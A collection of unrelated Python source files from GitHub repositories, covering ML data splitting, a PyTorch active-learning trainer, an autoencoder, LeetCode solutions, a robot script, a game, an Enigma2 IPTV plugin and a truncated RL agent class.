| conradsuuna/uac-computer-competency | app/controllers/users.py | users.py | py | 4,056 | python | en | code | 0 | github-code | 36 |
72766865064 | import numpy as np
import random
import csv
class traintest:
def __init__(self,cnames,instx=0):
self.train=[]
self.test=[]
self.cnames=cnames
self.ofiles=[]
for j in range(len(self.cnames)):
tfname='friends/train_'+self.cnames[j].lower()+'.txt'
pf=open(tfname,'w')
self.ofiles.append(pf)
self.instx=instx
self.train_ofile=open('friends/training.txt','w')
self.test_ofile=open('friends/testing.txt','w')
csvfile1=open('chandler_rest.csv', 'w',newline='')
self.csvfile=csv.writer(csvfile1,delimiter=',')
def prinitit(self,separate=True):
if separate==False:
for j in range(len(self.train)):
#self.train_ofile.write(str(j+1)+','+self.train[j]+'\n')
self.csvfile.writerow(self.train[j])
else:
for j in range(len(self.train)):
spx=self.train[j] #.split(',')
character=spx[-1]
toprint=",".join(spx[:-1])
indxxx=self.cnames.index(character)
self.ofiles[indxxx].write(str(j+1)+','+toprint+'\n')
for k in range(len(self.test)):
topprint=",".join(self.test[k])
self.test_ofile.write(str(k+1)+','+topprint+'\n')
def processfiles(self):
arrx=[]
#cdict={'Chandler':1,'Rachel':2,'Joey':3}
#cdict={'Sheldon':1,'Leonard':2,'Penny':3}
#cdict={'Sheldon':1,'Penny':2,'Bernadette':3,'Amy':4,'Raj':5,'Leonard':6}
#cdict={'Chandler':0,'Joey':1,'Rachel':2,'Ross':4,'Monica':5,'Phoebe':6}
for j in range(len(self.cnames)):
el=self.cnames[j]
#fname='../ngrams/ngramdata/unigram_vectors_tfidf_'+el.lower()+'.txt'
#fname='../liwc/liwcfeatures/liwc_'+el.lower()+'.txt'
#fname='../data_central/combined_new_'+el.lower()+'.txt'
#fname='../liwc/liwcfeatures/liwc_'+el.lower()+'.txt'
fname='../intermediate/liwc_'+el.lower()+'.csv'
filex=open(fname,'r',encoding='utf8')
flines=filex.readlines()
#labels='../liwc/liwcfeatures/liwc_'+el.lower()+'.txt'
#labels=labels.split(',')
if j==0:
print("not doing shit!")
#self.csvfile.writerow(labels)
#print("labels=",labels)
flines=flines[1:]
random.shuffle(flines)
for k in range(len(flines)):
thisline=flines[k]
q1=thisline[:-1]
q2=q1[:-1]
#print("q1=",q1)
toadd=q1.split(",")
#if el!='Chandler':
# el='Other'
toadd.append(el.strip())
#q3=','.join(q1)
#toadd=q1+','+el
#toadd=thisline[:-1]+','+el #str(cdict[el])
if k<self.instx:
self.test.append(toadd)
else:
self.train.append(toadd)
random.shuffle(self.train)
random.shuffle(self.test)
print("Training:",len(self.train))
print("Testing:",len(self.test))
self.prinitit()
listx=['Chandler','Joey','Rachel','Ross','Monica','Phoebe']
#listx=['Sheldon','Penny','Leonard',]
#listx=['Sheldon','Penny','Bernadette','Amy','Raj','Leonard']
tt = traintest(listx)
tt.processfiles()
| arnab64/slugbot | feature_extraction/train_test/9_separate_train_test.py | 9_separate_train_test.py | py | 2,759 | python | en | code | 1 | github-code | 36 |
35578454600 | class cookie:
pass
a = cookie()
b = cookie()
print(type(a))
print(type(b))
class FourCal:
#first = 0
#second = 0
def setdata(self,first,second):
self.first = first
self.second = second
def add(self):
result = self.first + self.second
return result
c = FourCal()
c.first = 10
c.second = 20
print(c.first)
print(c.second)
d = FourCal()
d.setdata(3,4)
print(id(c))
print(id(d))
print(id(c.first))
print(id(d.first))
sumresult = c.add()
print(sumresult) | kamkm01/20190615python | python_basic/class_test.py | class_test.py | py | 508 | python | en | code | 0 | github-code | 36 |
3458614577 | class Solution(object):
def largeGroupPositions(self, s):
"""
:type s: str
:rtype: List[List[int]]
"""
res = []
stack = []
for index, ele in enumerate(s):
if not stack: #stack is empty
stack.append(ele)
else:
if stack[-1] == ele:
stack.append(ele)
else:
if len(stack) >= 3:
res.append([index - len(stack), index - 1])
stack = []
stack.append(ele)
if len(stack) >= 3:
res.append([index - len(stack)+1, index])
return res
class Solution(object):
def largeGroupPositions(self, s):
class Stack():
def __init__(self):
self.data = []
def length(self):
return len(self.data)
def push(self, ele):
if not self.data:
self.data.append(ele)
return 1
else:
if self.data[-1] != ele:
self.data = []
self.data.append(ele)
return 1
else:
self.data.append(ele)
return len(self.data)
stack = Stack()
res = []
for index, ele in enumerate(s):
num = stack.push(ele)
if num == 3:
res.append([index - num+1, index])
if num > 3:
res.pop()
res.append([index - num+1, index])
return res
class Solution:
def largeGroupPositions(self, s):
res = []
n, num = len(s), 1
for i in range(n):
if i == n - 1 or s[i] != s[i+1]:
if num >= 3:
res.append([i - num + 1, i])
num = 1
else:
num += 1
return res
if __name__ == '__main__':
s = "abbxxxxzzy"
# s = "aaa"
# s = "aeeeeeeaabbbcd"
s = "abcdddeeeeaabbbcd"
print(Solution().largeGroupPositions(s)) | pi408637535/Algorithm | com/study/algorithm/daily/830. Positions of Large Groups.py | 830. Positions of Large Groups.py | py | 2,159 | python | en | code | 1 | github-code | 36 |
31113872518 | """
The main script that serves as the entry-point for all kinds of training experiments.
"""
from __future__ import annotations
import logging
from functools import partial
from typing import TYPE_CHECKING, Any, Callable, Mapping, Optional, Sequence, Tuple, Union
import torch
from al.core.data.collators import JointBatchToTensorDataCollator
from al.core.models.vaal.xai_model import VAALXAIModel
from al.core.training.query_strategies.factory import QueryStrategyFactory
from al.core.training.trainer import DALTrainer
from ignite.contrib.handlers import TensorboardLogger
from torch import nn
from xai_torch.core.args import Arguments
from xai_torch.core.constants import DataKeys
from xai_torch.core.models.utilities.data_collators import BatchToTensorDataCollator
from xai_torch.core.models.xai_model import XAIModel
from xai_torch.core.training.utilities import reset_random_seeds
if TYPE_CHECKING:
from al.core.training.query_strategies.base import QueryStrategy
from xai_torch.core.args import Arguments
from xai_torch.core.data.data_modules.base import BaseDataModule
from al.core.data.active_learning_datamodule import ActiveLearningDataModule
from ignite.engine import Engine
from xai_torch.core.training.constants import TrainingStage
logging.basicConfig(level=logging.INFO)
class VAALTrainer(DALTrainer):
@classmethod
def configure_running_avg_logging(cls, args: Arguments, engine: Engine, stage: TrainingStage):
from ignite.metrics import RunningAverage
def output_transform(x: Any, index: int, name: str) -> Any:
import numbers
import torch
if isinstance(x, Mapping):
return x[name]
elif isinstance(x, Sequence):
return x[index]
elif isinstance(x, (torch.Tensor, numbers.Number)):
return x
else:
raise TypeError(
"Unhandled type of update_function's output. "
f"It should either mapping or sequence, but given {type(x)}"
)
# add loss as a running average metric
for i, n in enumerate([f"{step}_{DataKeys.LOSS}" for step in ["task", "vae", "dsc"]]):
RunningAverage(
alpha=0.5, output_transform=partial(output_transform, index=i, name=n), epoch_bound=False
).attach(engine, f"{stage}/{n}")
@classmethod
def setup_training_engine(cls, args, model, train_dataloader, val_dataloader, output_dir, tb_logger, device):
# setup training engine
training_engine = cls.initialize_training_engine(
args=args, model=model, train_dataloader=train_dataloader, device=device
)
validation_engine = None
if args.general_args.do_val:
# setup validation engine
validation_engine = cls.initialize_validation_engine(args=args, model=model, device=device)
# configure training and validation engines
cls.configure_training_engine(
args=args,
training_engine=training_engine,
model=model,
output_dir=output_dir,
tb_logger=tb_logger,
train_dataloader=train_dataloader,
validation_engine=validation_engine,
val_dataloader=val_dataloader,
)
# add training hooks from the model
model.add_training_hooks(training_engine)
return training_engine, validation_engine
@classmethod
def initialize_training_engine(
cls,
args: Arguments,
model: VAALXAIModel,
train_dataloader: DataLoader,
device: Optional[Union[str, torch.device]] = torch.device("cpu"),
scaler: Optional["torch.cuda.amp.GradScaler"] = None,
) -> Callable:
def cycle(iterable):
while True:
for i in iterable:
yield i
if args.training_args.gradient_accumulation_steps <= 0:
raise ValueError(
"Gradient_accumulation_steps must be strictly positive. "
"No gradient accumulation if the value set to one (default)."
)
from ignite.engine import Engine
# get related arguments
gradient_accumulation_steps = args.training_args.gradient_accumulation_steps
non_blocking = args.training_args.non_blocking_tensor_conv
train_datacycler = cycle(train_dataloader)
def update_model(engine, model, batch, step="task"):
from xai_torch.core.constants import DataKeys
# perform optimizers zero_grad() operation with gradient accumulation
if (engine.state.iteration - 1) % gradient_accumulation_steps == 0:
print(step, "zero grad")
model.optimizers[step].zero_grad()
# forward pass
model_output = model.torch_model.training_step(batch=batch, step=step)
# make sure we get a dict from the model
assert isinstance(model_output, dict), "Model must return an instance of dict."
# get loss from the output dict
loss = model_output[DataKeys.LOSS]
# accumulate loss if required
if gradient_accumulation_steps > 1:
loss = loss / gradient_accumulation_steps
# backward pass
loss.backward()
print(step, loss)
# perform optimizer update for correct gradient accumulation step
if engine.state.iteration % gradient_accumulation_steps == 0:
model.optimizers[step].step()
print(step, "step update")
# if on the go training evaluation is required, detach data from the graph
if args.training_args.eval_training and step == "task":
return_dict = {}
for key, value in model_output.items():
if key == DataKeys.LOSS:
return_dict[key] = value.item()
elif isinstance(value, torch.Tensor):
return_dict[key] = value.detach()
return return_dict
return {f"{step}_{DataKeys.LOSS}": model_output[DataKeys.LOSS].item()}
def training_step(engine: Engine, _) -> Union[Any, Tuple[torch.Tensor]]:
"""
Define the model training update step
"""
from ignite.utils import convert_tensor
# setup model for training
model.torch_model.train()
# get batch from dataloader
batch = next(train_datacycler)
# put batch to device
batch = convert_tensor(batch, device=device, non_blocking=non_blocking)
# call task model update
task_output = update_model(engine, model, batch, step="task")
# call the vae update
for count in range(args.al_args.training_args.num_vae_steps):
vae_output = update_model(engine, model, batch, step="vae")
# sample new batch if needed to train the adversarial network
if count < (args.al_args.training_args.num_vae_steps - 1):
batch = next(train_datacycler)
batch = convert_tensor(batch, device=device, non_blocking=non_blocking)
# call the dsc update
for count in range(args.al_args.training_args.num_adv_steps):
dsc_output = update_model(engine, model, batch, step="dsc")
# sample new batch if needed to train the adversarial network
if count < (args.al_args.training_args.num_adv_steps - 1):
batch = next(train_datacycler)
batch = convert_tensor(batch, device=device, non_blocking=non_blocking)
return {**task_output, **vae_output, **dsc_output}
return Engine(training_step)
@classmethod
def setup_model(
cls,
args: Arguments,
datamodule: BaseDataModule,
tb_logger: TensorboardLogger,
summarize: bool = False,
stage: TrainingStage = TrainingStage.train,
) -> XAIModel:
"""
Initializes the model for training.
"""
from xai_torch.core.models.factory import ModelFactory
# setup model
model = ModelFactory.create(args, datamodule, tb_logger=tb_logger, wrapper_class=VAALXAIModel)
model.setup(stage=stage)
# generate model summary
if summarize:
model.summarize()
return model
@classmethod
def train(cls, local_rank, args: Arguments):
"""
Initializes the training of a model given dataset, and their configurations.
"""
import ignite.distributed as idist
from xai_torch.core.training.utilities import initialize_training, setup_logging
from xai_torch.utilities.logging_utils import DEFAULT_LOGGER_NAME, setup_logger
# setup logging
logger = setup_logger(DEFAULT_LOGGER_NAME, distributed_rank=local_rank, level=logging.INFO)
# initialize training
initialize_training(args)
# initialize torch device (cpu or gpu)
device = idist.device()
# get device rank
rank = idist.get_rank()
# initialize logging directory and tensorboard logger
output_dir, tb_logger = setup_logging(args)
# setup datamodule
datamodule: ActiveLearningDataModule = cls.setup_datamodule(args, rank=rank, stage=None)
# setup model
model = cls.setup_model(args, datamodule, tb_logger, summarize=True)
# define active learning query strategy
query_strategy: QueryStrategy = QueryStrategyFactory.create(
datamodule=datamodule, model=model, device=device, args=args.al_args
)
# load active learning state
al_state = DALTrainer.load_round_state(0, datamodule, output_dir=output_dir)
curr_round = al_state["curr_round"]
if curr_round == args.al_args.n_rounds:
logger.warning(
"Active learning rounds have already been finished! Either increase the number of "
f"max rounds (current={args.al_args.n_rounds}) "
"OR reset the training from start."
)
exit()
# reset seeds for training. This allows multiple experiments with same seed for dataset initialization but
# different seeds for the active learning training process.
reset_random_seeds(args.al_args.al_seed)
while curr_round < args.al_args.n_rounds:
from al.core.training.query_strategies.impl.ceal import CEAL
logger.info(f"============== Running round={curr_round} of active learning ===========")
# update tblogger dir
tb_logger = None
if rank == 0:
from ignite.contrib.handlers import TensorboardLogger
tb_logger = TensorboardLogger(output_dir / str(curr_round))
# print labels summary
datamodule.print_label_summary()
# Reset model for re-training
if args.al_args.reset_model:
model = cls.setup_model(args, datamodule, tb_logger, summarize=False)
else:
# Reset only optimizers and schedulers
model._opt_sch_handler.setup_opt_sch()
# get train dataloader for labelled data
joint_dataloader = datamodule.get_joint_dataset_loader(
collate_fn=JointBatchToTensorDataCollator(datamodule._collate_fns.train)
)
# get validation data loader
val_dataloader = datamodule.val_dataloader()
# setup training engine
training_engine, _ = cls.setup_training_engine(
args=args,
model=model,
train_dataloader=joint_dataloader,
val_dataloader=val_dataloader,
output_dir=output_dir / str(curr_round), # append round number to output_dir
tb_logger=tb_logger,
device=device,
)
training_engine.logger = logger
resume_epoch = training_engine.state.epoch
if not (training_engine._is_done(training_engine.state) or resume_epoch >= args.training_args.max_epochs):
# run training
training_engine.run(range(len(joint_dataloader)), max_epochs=args.training_args.max_epochs)
# training_engine.run(labeled_dataloader, max_epochs=args.training_args.max_epochs)
# after the training, the test engine automatically loads the 'best' model to continue the rounds.
test_dataloader = datamodule.test_dataloader()
# run testing after the end of every round
test_engine = cls.setup_test_engine(
args=args,
model=model,
test_dataloader=test_dataloader,
output_dir=output_dir / str(curr_round),
tb_logger=tb_logger,
device=device,
)
test_engine.logger = logger
test_engine.run(test_dataloader)
else:
# if we are resuming from last checkpoint and training is already finished
logger.info(
"Training has already been finished! Either increase the number of "
f"epochs (current={args.training_args.max_epochs}) >= {resume_epoch} "
"OR reset the training from start."
)
# after the training, the test engine automatically loads the 'best' model to continue the rounds.
test_dataloader = datamodule.test_dataloader()
# don't run test but just set it up so that model has latest correct checkpoint loaded
test_engine = cls.setup_test_engine(
args=args,
model=model,
test_dataloader=test_dataloader,
output_dir=output_dir / str(curr_round),
tb_logger=tb_logger,
device=device,
)
# NOTE: The test engine has already updated the model state with state of last/best
# checkpoint which will be used for querying of the next round.
def perform_query():
import timeit
# reset the querying strategy
query_strategy.reset(model)
# update the labeled pool
start = timeit.default_timer()
n_query_samples = int(args.al_args.n_query_ratio * datamodule.pool_size)
if isinstance(query_strategy, CEAL):
query_indices = query_strategy.query(n_samples=n_query_samples, round=curr_round)
else:
query_indices = query_strategy.query(n_samples=n_query_samples)
stop = timeit.default_timer()
tb_logger.writer.add_scalar("query_time", stop - start, curr_round)
datamodule.update_dataset_labels(query_indices)
# perform query
perform_query()
# save active learning query state for next round
DALTrainer.save_round_state(curr_round + 1, datamodule, output_dir=output_dir)
if rank == 0:
# close tb logger
tb_logger.close()
curr_round += 1
| saifullah3396/doc_al | src/al/core/training/vaal_trainer.py | vaal_trainer.py | py | 15,573 | python | en | code | 0 | github-code | 36 |
6215124822 | from rodi import RoDI
import time
robot = RoDI()
def reubicar():
robot.move_stop()
robot.pixel(20,0,0)
robot.move_backward()
time.sleep(0.1)
robot.move_left()
time.sleep(0.5)
robot.move_forward()
time.sleep(0.5)
def ataque():
robot.move(100,100)
while True:
try:
distancia = robot.see()
linea = robot.sense()
robot.pixel(20,20,20)
robot.move(30,30)
time.sleep(0.1)
inicio_de_ataque = None
print("Distancia: " + str(distancia))
print("Linea 1: " + str(linea[0]))
print("Linea 2: " + str(linea[1]))
if (linea[0] >= 100 or linea[1] >= 100):
reubicar()
if distancia < 15:
ataque()
inicio_de_ataque = time.time()
if time.time() - inicio_de_ataque > 2:
reubicar()
except KeyboardInterrupt:
robot.move_stop()
break
| devpbeat/bootcamp | rob.py | rob.py | py | 921 | python | es | code | 0 | github-code | 36 |
14007726581 | import torch
import torch.nn as nn
import os
from torchvision import datasets, transforms
from torch.utils.data import DataLoader, Dataset
import wandb
from PIL import Image
import numpy as np
from tqdm import tqdm
from torch.optim.lr_scheduler import ExponentialLR
class Encoder(nn.Module):
def __init__(self, encoded_space_dim):
super().__init__()
### Convolutional section
self.encoder_cnn = nn.Sequential(
nn.Conv2d(in_channels = 3, out_channels = 8, kernel_size = 9, stride=2, padding=2),
nn.ReLU(True),
nn.Conv2d(in_channels = 8, out_channels = 16, kernel_size = 9, stride=2, padding=2),
nn.BatchNorm2d(16),
nn.ReLU(True),
nn.Conv2d(in_channels = 16, out_channels = 32, kernel_size = 9, stride=2, padding=2),
nn.BatchNorm2d(32),
nn.ReLU(True),
nn.Conv2d(in_channels = 32, out_channels = 64, kernel_size = 9, stride=2, padding=1),
nn.ReLU(True),
)
### Flatten layer
self.flatten = nn.Flatten(start_dim=1)
### Linear section
self.encoder_lin = nn.Sequential(
nn.Linear(8 * 8 * 64, encoded_space_dim),
nn.ReLU(True),
)
def forward(self, x):
x = self.encoder_cnn(x)
x = self.flatten(x)
x = self.encoder_lin(x)
return x
class Decoder(nn.Module):
def __init__(self, encoded_space_dim):
super().__init__()
self.decoder_lin = nn.Sequential(
nn.Linear(encoded_space_dim, 8 * 8 * 64),
nn.ReLU(True)
)
self.unflatten = nn.Unflatten(dim=1,
unflattened_size=(64, 8, 8))
self.decoder_conv = nn.Sequential(
nn.ConvTranspose2d(in_channels = 64, out_channels = 32, kernel_size = 9, stride=2, padding = 1, output_padding= 1,),
nn.BatchNorm2d(32),
nn.ReLU(True),
nn.ConvTranspose2d(in_channels = 32, out_channels = 16, kernel_size = 9, stride=2, padding = 2, output_padding = 1),
nn.BatchNorm2d(16),
nn.ReLU(True),
nn.ConvTranspose2d(in_channels = 16, out_channels = 8, kernel_size = 9, stride=2, padding = 3, output_padding = 1),
nn.BatchNorm2d(8),
nn.ReLU(True),
nn.ConvTranspose2d(in_channels = 8, out_channels = 3, kernel_size = 9, stride=2, padding = 2, output_padding = 1),
)
self.post_net =nn.Sequential(
nn.Conv2d(in_channels=3, out_channels=16, kernel_size=5, padding=2),
nn.BatchNorm2d(16),
nn.ReLU(True),
nn.Conv2d(in_channels=16, out_channels=8, kernel_size=5, padding=2),
nn.BatchNorm2d(8),
nn.ReLU(True),
nn.Conv2d(in_channels=8, out_channels=3, kernel_size=5, padding=2),
)
def forward(self, x):
x = self.decoder_lin(x)
x = self.unflatten(x)
x = self.decoder_conv(x)
x = torch.sigmoid(x)
y = self.post_net(x)
y = torch.sigmoid(x + y)
return x, y
def train(encoder, decoder, train_loader, device = 'cpu', logger = None):
optimizer = torch.optim.Adam(list(encoder.parameters()) + list(decoder.parameters()), lr=0.0001, weight_decay=1e-05)
scheduler = ExponentialLR(optimizer, gamma=0.9)
loss_func = nn.MSELoss()
encoder.to(device).train()
decoder.to(device).train()
for epoch in range(100):
for step, x in enumerate(train_loader):
x = torch.tensor(x.clone() , dtype = torch.float32, device = device) / 255.0
pre_out, post_out = decoder(encoder(x))
loss = 0.8 * loss_func(pre_out, x) + loss_func(post_out, x)
optimizer.zero_grad()
loss.backward()
optimizer.step()
logger.log({'Loss': loss.cpu().item()})
input = wandb.Image(x[0].cpu().detach().numpy().reshape(200,200,3))
output = wandb.Image(post_out[0].cpu().detach().numpy().reshape(200,200,3))
logger.log({"Input": input,
"Output": output})
scheduler.step()
class UTKFaceDataset(Dataset):
def __init__(self, test_size = .2, data_type = "train"):
"""
Create data loader for UTKFace dataset
"""
self.data_dir = 'data/UTKFace/'
self.all_files = os.listdir(self.data_dir)
if data_type == "train":
self.data = []
for file in tqdm(self.all_files[:]):
img = Image.open(self.data_dir + file)
self.data.append(np.asanyarray(img).reshape(3,200,200))
img.close()
self.X = torch.tensor(np.stack(self.data))
def get_data(self):
return self.X.shape, self.y.shape
def __len__(self):
return self.X.shape[0]
def __getitem__(self, idx):
img = self.X[idx]
return img
if __name__ == '__main__':
dim = 256
# torch.manual_seed(1000)
dataset = UTKFaceDataset()
# train_loader = DataLoader(datasets, batch_size=32, shuffle=True)
# logger = wandb.init(project="autoencoder", name=f"AE {dim} TEST", entity='petergroenning')
encoder_weights = torch.load('models/encoder_256.pt', map_location=torch.device('cpu'))
decoder_weights = torch.load('models/decoder_256.pt', map_location=torch.device('cpu'))
encoder = Encoder(encoded_space_dim=dim)
decoder = Decoder(encoded_space_dim=dim)
encoder.load_state_dict(encoder_weights)
decoder.load_state_dict(decoder_weights)
encoder.eval()
decoder.eval()
print(dataset.X.shape)
# decoder = Decoder(encoded_space_dim=dim, fc2_input_dim=512)
# torch.manual_seed(1000)
# train(encoder, decoder, train_loader, device = 'cuda', logger = logger)
# torch.save(encoder.state_dict(), f"encoder_{dim}.pth")
# torch.save(decoder.state_dict(), f"decoder{dim}.pth")
| s183920/02582_Computational_Data_Analysis_Case2 | autoencoder.py | autoencoder.py | py | 6,011 | python | en | code | 0 | github-code | 36 |
25127011115 | #!/usr/bin/python
# -*- coding: utf-8 -*-
'''
****************************************
* coded by Lululla & PCD *
* skin by MMark *
* 26/03/2023 *
* Skin by MMark *
****************************************
# --------------------#
# Info http://t.me/tivustream
'''
from __future__ import print_function
from Components.ActionMap import ActionMap
from Components.Label import Label
from Components.Pixmap import Pixmap
from Screens.Screen import Screen
from Tools.Directories import SCOPE_PLUGINS
from Tools.Directories import resolveFilename
from enigma import eTimer
import codecs
import os
import re
import six
import ssl
import sys
from Plugins.Extensions.xxxplugin.plugin import rvList, Playstream1
from Plugins.Extensions.xxxplugin.plugin import show_
from Plugins.Extensions.xxxplugin.lib import Utils
from Plugins.Extensions.xxxplugin import _, skin_path
PY3 = sys.version_info.major >= 3
print('Py3: ', PY3)
if sys.version_info >= (2, 7, 9):
try:
sslContext = ssl._create_unverified_context()
except:
sslContext = None
currversion = '1.0'
title_plug = 'freearhey '
desc_plugin = ('..:: freearhey by Lululla %s ::.. ' % currversion)
PLUGIN_PATH = resolveFilename(SCOPE_PLUGINS, "Extensions/{}".format('xxxplugin'))
current = os.path.dirname(os.path.realpath(__file__))
parent = os.path.dirname(current)
sys.path.append(parent)
print(current)
print(parent)
pluglogo = os.path.join(PLUGIN_PATH, 'pic/freearhey.png')
stripurl = 'aHR0cHM6Ly9pcHR2LW9yZy5naXRodWIuaW8vaXB0di9jYXRlZ29yaWVzL3h4eC5tM3U='
referer = 'https://github.com/iptv-org/iptv'
_session = None
Path_Movies = '/tmp/'
PY3 = sys.version_info.major >= 3
class main(Screen):
def __init__(self, session):
self.session = session
Screen.__init__(self, session)
skin = os.path.join(skin_path, 'defaultListScreen.xml')
with codecs.open(skin, "r", encoding="utf-8") as f:
self.skin = f.read()
self.menulist = []
self['menulist'] = rvList([])
self['red'] = Label(_('Back'))
# self['green'] = Label(_('Export'))
self['title'] = Label('')
self['title'].setText(title_plug)
self['name'] = Label('')
self['text'] = Label('Only for Adult by Lululla')
self['poster'] = Pixmap()
self.currentList = 'menulist'
self['actions'] = ActionMap(['OkCancelActions',
'ColorActions',
'DirectionActions',
'MovieSelectionActions'], {'up': self.up,
'down': self.down,
'left': self.left,
'right': self.right,
'ok': self.ok,
'green': self.ok,
'cancel': self.exit,
'red': self.exit}, -1)
self.timer = eTimer()
if Utils.DreamOS():
self.timer_conn = self.timer.timeout.connect(self.updateMenuList)
else:
self.timer.callback.append(self.updateMenuList)
self.timer.start(500, True)
def up(self):
self[self.currentList].up()
auswahl = self['menulist'].getCurrent()[0][0]
self['name'].setText(str(auswahl))
def down(self):
self[self.currentList].down()
auswahl = self['menulist'].getCurrent()[0][0]
self['name'].setText(str(auswahl))
def left(self):
self[self.currentList].pageUp()
auswahl = self['menulist'].getCurrent()[0][0]
self['name'].setText(str(auswahl))
def right(self):
self[self.currentList].pageDown()
auswahl = self['menulist'].getCurrent()[0][0]
self['name'].setText(str(auswahl))
def updateMenuList(self):
self.cat_list = []
for x in self.cat_list:
del self.cat_list[0]
items = []
try:
url = Utils.b64decoder(stripurl)
content = Utils.getUrl2(url, referer)
if six.PY3:
content = six.ensure_str(content)
regexcat = '#EXTINF.*?title="(.+?)".*?,(.+?)\\n(.+?)\\n'
match = re.compile(regexcat, re.DOTALL).findall(content)
for country, name, url in match:
if ".m3u8" not in url:
continue
url = url.replace(" ", "").replace("\\n", "").replace('\r', '')
name = name.replace('\r', '')
name = country + ' | ' + name
item = name + "###" + url + '\n'
items.append(item)
items.sort()
for item in items:
name = item.split('###')[0]
url = item.split('###')[1]
name = name.capitalize()
self.cat_list.append(show_(name, url))
self['menulist'].l.setList(self.cat_list)
auswahl = self['menulist'].getCurrent()[0][0]
self['name'].setText(str(auswahl))
except Exception as e:
print('exception error ', str(e))
def ok(self):
name = self['menulist'].getCurrent()[0][0]
url = self['menulist'].getCurrent()[0][1]
self.play_that_shit(url, name)
def play_that_shit(self, url, name):
self.session.open(Playstream1, str(name), str(url))
def exit(self):
self.close()
| Belfagor2005/xxxplugin | usr/lib/enigma2/python/Plugins/Extensions/xxxplugin/Sites/freearhey.py | freearhey.py | py | 5,713 | python | en | code | 0 | github-code | 36 |
71335895783 | def cycleDetection(edges, n, m):
# Write your code here.
# Return "Yes" if cycle id present in the graph else return "No".
white, grey ,black = range(3)
adjList = []
for x in range(n+1):
adjList.append([])
for u, v in edges:
adjList[u].append(v)
adjList[v].append(u)
answer = "No"
visited = [False for x in range(n+1)]
color = [white for x in range(n+1)]
def getFirstIndexWithFalse(visited):
for index, value in enumerate(visited):
if index==0:
continue
if not value:
return True, index
return False, -1
def cycleDetectDFS(adjList, node, parent):
if color[node]==grey:
return True
color[node]=grey
visited[node] = True
for child in adjList[node]:
if child!=parent:
visited[child] = True
if cycleDetectDFS(adjList, child, node):
return True
color[node] = black
return False
while True:
isSomewhereFalse, indexOfFalse = getFirstIndexWithFalse(visited)
if isSomewhereFalse:
if cycleDetectDFS(adjList, indexOfFalse, None):
answer = "Yes"
break
else:
break
return answer | architjee/solutions | CodingNinjas/Detect Cycle in Undirected Graph.py | Detect Cycle in Undirected Graph.py | py | 1,323 | python | en | code | 0 | github-code | 36 |
2343066126 | import pygame
import Config
import random
import math
import entities
from entity import Entity
class Meteor(Entity):
def __init__(self, img):
self.x = random.randint(0, Config.WIDTH)
self.y = 0
self.size = random.randint(20, 65)
self.speed = random.randint(3, 5)
self.damage = self.size * self.speed / 10
self.mass = self.size ** 2
self.kineticStrong = self.mass * self.speed
self.startPosition = (self.x, self.y)
self.img = pygame.transform.rotate(pygame.transform.scale(img, (self.size, self.size)), random.randint(0, 360))
self.direction = random.choice([random.randint(-180, -100), random.randint(100, 180)])
self.isAlive = True
self.radius = 47
self.maxhealth = self.size * 3
self.health = self.maxhealth
self.baseRotation = random.randint(1, 10)
self.contacts = []
def render(self, window):
self.move()
self.draw(window)
self.checkBorders()
self.checkBeat()
self.checkHealth()
self.updateContacts()
def updateContacts(self):
clone = self.contacts.copy()
for contact in clone:
if contact[1] < 1000 / Config.FPS:
self.contacts.remove(contact)
else: contact[1] -= 1000 / Config.FPS
def checkBeat(self):
clone = entities.entities.copy()
for entity in clone:
if not isinstance(entity, Meteor) and entity.checkCollision((self.x, self.y)):
entity.takeDamage(self.damage)
self.diy()
elif isinstance(entity, Meteor) and entity.checkCollisionWithAnotherMeteor(self) and entity != self:
isContacted = False
for contact in self.contacts:
if contact[0] == entity: isContacted = True
if not isContacted:
entity.beat(self)
self.beat(entity)
def beat(self, another):
self.contacts.append([another, 500])
def getDifferenceBetweenDegrees(deg1, deg2):
if deg1 < 0: deg1 = 360 + deg1
if deg2 < 0: deg2 = 360 + deg2
return deg1 - deg2
aks = another.kineticStrong
self.direction += getDifferenceBetweenDegrees(self.direction, another.direction) * (self.kineticStrong + aks) / aks
self.fixDirection()
def checkCollisionWithAnotherMeteor(self, another):
return math.sqrt(abs(another.x - self.x) ** 2 + abs(another.y - self.y) ** 2) <= self.radius + another.radius
def fixDirection(self):
while self.direction > 180:
self.direction += -360
while self.direction < -180:
self.direction += 360
def draw(self, window):
window.blit(self.img, (self.x, self.y))
def diy(self):
self.addDeathParticles()
self.isAlive = False
def move(self):
self.fixDirection()
def reverse(deg):
if deg > 90: return 180 - deg
if deg < -90: return -180 - deg
d = self.direction
movementX = 0
movementY = 0
if d <= 90 and d >= -90:
movementX = self.speed * -d / 90
else:
movementX = self.speed * -reverse(d) / 90
if d >= 0:
movementY = self.speed * (90 - d) / 90
elif d < 0:
movementY = self.speed * (90 + d) / 90
self.x += movementX
self.y -= movementY
def checkBorders(self):
if self.x > Config.WIDTH + self.size or self.x < -self.size:
self.isAlive = False
if self.y > Config.HEIGHT + self.size or self.y < -self.size:
self.isAlive = False
def checkHealth(self):
if self.health <= 0:
self.diy()
def addDeathParticles(self):
entities.effects.explosionEffect((self.x, self.y))
| Krakozaybr/Meteorro | cooperate/meteor.py | meteor.py | py | 3,997 | python | en | code | 0 | github-code | 36 |
17381398214 | """
Implementation of the human and machine policies in the paper
"""
from copy import copy
import random
import numpy as np
import math
import torch
from collections import defaultdict
from environments.env import Environment, GridWorld
from networks.networks import ActorNet
class Agent:
"""
Agent superclass
"""
def __init__(self):
self.policy = {}
def update_obs(self, *args):
"""Add observations to the record"""
def update_policy(self, *args):
"""Update the action policy"""
def take_action(self, *args):
"""Return an action based on the policy"""
class MachineDriverAgent(Agent):
def __init__(self, n_state_features, n_actions, optimizer, setting=1, c_M=0., entropy_weight=0.01, batch_size=1):
"""Initialize network and hyperparameters"""
super(MachineDriverAgent, self).__init__()
# n_state_features[1] is the network input size
self.network = ActorNet(n_state_features[1], n_actions)
self.optimizer = optimizer(self.network.parameters())
self.entropy_weight_0 = entropy_weight
self.timestep = 0
self.control_cost = c_M
self.trainable = True
self.M_t = np.zeros(batch_size)
self.setting = setting
# n_state_features[0] is the number of state features
self.n_state_features = n_state_features[0]
def update_obs(self, *args):
"""Return input batch for training"""
pass
def update_policy(self, weighting, delta, log_pi, entropy, use_entropy=True):
"""
Implement train step
Parameters
----------
weighting: torch.LongTensor
For off-policy weighting = M_t * rho_t, for on-policy weighting = switch(s)
delta: torch.LongTensor
For off-policy delta = TD_error, for on-policy delta = v(s)
current_policy: Categorical
The current action policy distribution
action: int
The action taken
"""
if use_entropy:
self.timestep+=1
self.entropy_weight = self.entropy_weight_0/self.timestep
else:
self.entropy_weight = 0
# weighting and delta must have been computed with torch.no_grad()
